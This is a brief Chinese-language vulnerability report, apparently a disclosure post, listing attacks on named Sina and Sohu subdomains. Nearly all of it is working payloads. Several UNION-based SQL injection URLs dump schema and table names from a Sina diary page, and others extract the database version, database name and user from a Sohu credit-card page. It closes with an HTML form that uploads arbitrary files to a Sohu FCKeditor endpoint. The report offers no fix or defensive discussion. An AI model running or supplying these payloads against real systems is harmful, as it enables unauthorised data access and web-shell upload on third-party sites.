Sina,sohu高危注入漏洞

sina

注入页面：
http://php.baby.sina.com.cn/diary/list.php

爆数据库：
http://php.baby.sina.com.cn/diary/list.php?netid=5167%20and%201=2%20union%20select%201,2,3,group_concat(schema_name),5,6,7,8,9%20from%20information_schema.schemata--
爆表：
http://php.baby.sina.com.cn/diary/list.php?netid=51675115%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=0x70687062616279
sohu

http://card.money.sohu.com/yh/card_product.php?id=62 and 1=2 union   select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

http://card.money.sohu.com/yh/card_product.php?id=62 and 1=2 union   select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

http://card.money.sohu.com/yh/card_product.php?id=62 and 1=2 union   select 1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

<form id="frmUpload" enctype="multipart/form-data" action="http://club.sohu.com/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> 
Upload a new file:<br> 
<input type="file" name="NewFile" size="50"><br> 
<input id="btnUpload" type="submit" value="Upload"> 
</form>